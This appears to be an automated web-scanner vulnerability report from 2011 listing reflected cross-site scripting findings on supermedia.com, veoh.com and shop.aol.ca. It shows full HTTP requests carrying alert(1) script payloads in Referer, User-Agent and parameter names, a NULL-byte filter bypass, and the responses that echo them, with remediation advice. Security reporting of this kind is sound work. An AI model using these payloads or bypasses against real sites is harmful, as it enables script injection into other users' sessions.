GET /support/help/ HTTP/1.1 Host: www.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623; Referer: 13f3c"-alert(1)-"f8f23428e65
Response (redirected)
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 19:22:54 GMT Content-Type: text/html;charset=UTF-8 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Online Advertising : Superpages Small Business Online Advertising</title>
...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.channel=""; s.pagetype=""; s.server=""; s.referrer="13f3c"-alert(1)-"f8f23428e65"; s.pageName=""; s.prop1=""; s.prop2=""; s.prop3="Not Logged in"; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8=""; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=" ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1d1e"-alert(1)-"7bc6b80740c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /yellow-pages/ HTTP/1.1 Host: www.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623; Referer: e1d1e"-alert(1)-"7bc6b80740c
Response (redirected)
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 19:23:19 GMT Content-Type: text/html;charset=UTF-8 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Online Advertising : Superpages Small Business Online Advertising</title>
...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.channel=""; s.pagetype=""; s.server=""; s.referrer="e1d1e"-alert(1)-"7bc6b80740c"; s.pageName=""; s.prop1=""; s.prop2=""; s.prop3="Not Logged in"; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8=""; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=" ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d0f4"-alert(1)-"3372c90867f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 19:11:10 GMT Content-Type: text/html;charset=UTF-8 Connection: close Cache-Control: private Content-Length: 30942
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Small Business Marketing and Internet Advertising | SuperMedia.com</title>
...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.channel=""; s.pagetype=""; s.server=""; s.referrer="http://www.google.com/search?hl=en&q=8d0f4"-alert(1)-"3372c90867f"; s.pageName=""; s.prop1=""; s.prop2=""; s.prop3="Not Logged in"; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8=""; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=" ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 327fc"-alert(1)-"221a82e08e1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 19:48:57 GMT Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Content-Type: text/html;charset=UTF-8 Content-Language: en-US Connection: close Content-Length: 24711
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Online Advertising : Superpages Small Business Online Advertising</title>
...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.channel=""; s.pagetype=""; s.server=""; s.referrer="http://www.google.com/search?hl=en&q=327fc"-alert(1)-"221a82e08e1"; s.pageName=""; s.prop1=""; s.prop2=""; s.prop3="Not Logged in"; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8=""; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=" ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ba03"-alert(1)-"bdea14bb63f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: Unspecified Date: Fri, 04 Feb 2011 18:00:31 GMT Content-Type: text/html;charset=UTF-8 Connection: close Cache-Control: private Content-Length: 30942
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Small Business Marketing and Internet Advertising | SuperMedia.com</title>
...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.channel=""; s.pagetype=""; s.server=""; s.referrer="http://www.google.com/search?hl=en&q=8ba03"-alert(1)-"bdea14bb63f"; s.pageName=""; s.prop1=""; s.prop2=""; s.prop3="Not Logged in"; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8=""; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=" ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ecec8"-alert(1)-"4dc26327075 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 19:06:34 GMT Content-Type: text/html;charset=UTF-8 Connection: close Cache-Control: private Content-Length: 20885
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Online Advertising : Superpages Small Business Online Advertising</title>
...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.channel=""; s.pagetype=""; s.server=""; s.referrer="http://www.google.com/search?hl=en&q=ecec8"-alert(1)-"4dc26327075"; s.pageName=""; s.prop1=""; s.prop2=""; s.prop3="Not Logged in"; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8=""; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=" ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e44c7"-alert(1)-"c8e3ca72d49 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 19:21:26 GMT Content-Type: text/html;charset=UTF-8 Connection: close Cache-Control: private Content-Length: 20904
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Online Advertising : Superpages Small Business Online Advertising</title>
...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.channel=""; s.pagetype=""; s.server=""; s.referrer="http://www.google.com/search?hl=en&q=e44c7"-alert(1)-"c8e3ca72d49"; s.pageName=""; s.prop1=""; s.prop2=""; s.prop3="Not Logged in"; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8=""; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=" ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0f11"-alert(1)-"6068412b7ff was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /spportal/login.do HTTP/1.1 Host: www.supermedia.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: trafficSource="SP198c8\"; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; JSESSIONID=CD1B75B428F192D4B130C351A3081BAE.app2-a1; CstrStatus=RVU; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a42378b Referer: http://www.google.com/search?hl=en&q=c0f11"-alert(1)-"6068412b7ff
Response (redirected)
HTTP/1.1 200 OK Server: Unspecified Date: Fri, 04 Feb 2011 01:47:44 GMT Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Content-Type: text/html;charset=UTF-8 Content-Language: en-US Connection: close Content-Length: 24711
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Online Advertising : Superpages Small Business Online Advertising</title>
...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.channel=""; s.pagetype=""; s.server=""; s.referrer="http://www.google.com/search?hl=en&q=c0f11"-alert(1)-"6068412b7ff"; s.pageName=""; s.prop1=""; s.prop2=""; s.prop3="Not Logged in"; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8=""; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=" ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94ca4"-alert(1)-"a229106b012 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /spportal/myaccount.do;jsessionid=CD1B75B428F192D4B130C351A3081BAE.app2-a1 HTTP/1.1 Host: www.supermedia.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: trafficSource="SP198c8\"; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; JSESSIONID=CD1B75B428F192D4B130C351A3081BAE.app2-a1; CstrStatus=RVU; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a42378b Referer: http://www.google.com/search?hl=en&q=94ca4"-alert(1)-"a229106b012
Response (redirected)
HTTP/1.1 200 OK Server: Unspecified Date: Fri, 04 Feb 2011 01:48:17 GMT Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Content-Type: text/html;charset=UTF-8 Content-Language: en-US Connection: close Content-Length: 24711
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Online Advertising : Superpages Small Business Online Advertising</title>
...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.channel=""; s.pagetype=""; s.server=""; s.referrer="http://www.google.com/search?hl=en&q=94ca4"-alert(1)-"a229106b012"; s.pageName=""; s.prop1=""; s.prop2=""; s.prop3="Not Logged in"; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8=""; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=" ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 362e4"-alert(1)-"35b4846cf0a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 20:27:16 GMT Content-Type: text/html;charset=UTF-8 Connection: close Cache-Control: private Content-Length: 20885
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Online Advertising : Superpages Small Business Online Advertising</title>
...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.channel=""; s.pagetype=""; s.server=""; s.referrer="http://www.google.com/search?hl=en&q=362e4"-alert(1)-"35b4846cf0a"; s.pageName=""; s.prop1=""; s.prop2=""; s.prop3="Not Logged in"; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8=""; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=" ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ffa4"-alert(1)-"6ce0b4aea6f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 19:19:04 GMT Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Content-Type: text/html;charset=UTF-8 Content-Language: en-US Connection: close Content-Length: 20424
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<!-- UI framework designed and implemented by Advertiser Portal UI Team -->
<title>SuperPages ...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.channel=""; s.pagetype=""; s.server=""; s.referrer="http://www.google.com/search?hl=en&q=2ffa4"-alert(1)-"6ce0b4aea6f"; s.pageName=""; s.prop1="Processing Error Title"; s.prop2=""; s.prop3="Not Logged in"; s.prop4=""; s.prop5=""; s.prop6="General Exception"; s.prop7="Unable to extract the flow definition id parameter ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa04d"-alert(1)-"18e25f0779e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 19:48:20 GMT Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Content-Type: text/html;charset=UTF-8 Content-Language: en-US Connection: close Content-Length: 24711
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Online Advertising : Superpages Small Business Online Advertising</title>
...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.channel=""; s.pagetype=""; s.server=""; s.referrer="http://www.google.com/search?hl=en&q=fa04d"-alert(1)-"18e25f0779e"; s.pageName=""; s.prop1=""; s.prop2=""; s.prop3="Not Logged in"; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8=""; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=" ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00f909a"-alert(1)-"0aedf1bf8a2 was submitted in the Referer HTTP header. This input was echoed as f909a"-alert(1)-"0aedf1bf8a2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 19:07:09 GMT Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Content-Type: text/html;charset=UTF-8 Content-Language: en-US Connection: close Content-Length: 20379
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<!-- UI framework designed and implemented by Advertiser Portal UI Team -->
<title>SuperPages ...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.channel=""; s.pagetype=""; s.server=""; s.referrer="http://www.google.com/search?hl=en&q=%00f909a"-alert(1)-"0aedf1bf8a2"; s.pageName=""; s.prop1="Processing Error Title"; s.prop2=""; s.prop3="Not Logged in"; s.prop4=""; s.prop5=""; s.prop6="General Exception"; s.prop7="Badly formatted flow execution key ''||(utl_inaddr ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00f3def"-alert(1)-"88a42c498f7 was submitted in the Referer HTTP header. This input was echoed as f3def"-alert(1)-"88a42c498f7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 19:07:08 GMT Content-Type: text/html;charset=UTF-8 Connection: close Cache-Control: private Content-Length: 21226
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Online Advertising : Superpages Small Business Online Advertising</title>
...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.channel=""; s.pagetype=""; s.server=""; s.referrer="http://www.google.com/search?hl=en&q=%00f3def"-alert(1)-"88a42c498f7"; s.pageName=""; s.prop1="Processing Error Title"; s.prop2=""; s.prop3="Not Logged in"; s.prop4=""; s.prop5=""; s.prop6="General Exception"; s.prop7="Badly formatted flow execution key ''||(utl_inaddr ...[SNIP]...
The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 266d5"><script>alert(1)</script>a3477cdc5c1 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /video/flag/permalinkId/v18978294NGnK88j8 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)266d5"><script>alert(1)</script>a3477cdc5c1 Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:47:15 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=70 Content-Length: 32288
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <input type="hidden" value="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)266d5"><script>alert(1)</script>a3477cdc5c1" id="flagUserAgent" name="flagUserAgent"/> ...[SNIP]...
3.493. http://shop.aol.ca/store/list.adp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://shop.aol.ca
Path:
/store/list.adp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edadc"><script>alert(1)</script>81318b986fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /store/list.adp?edadc"><script>alert(1)</script>81318b986fe=1 HTTP/1.1 Host: shop.aol.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.
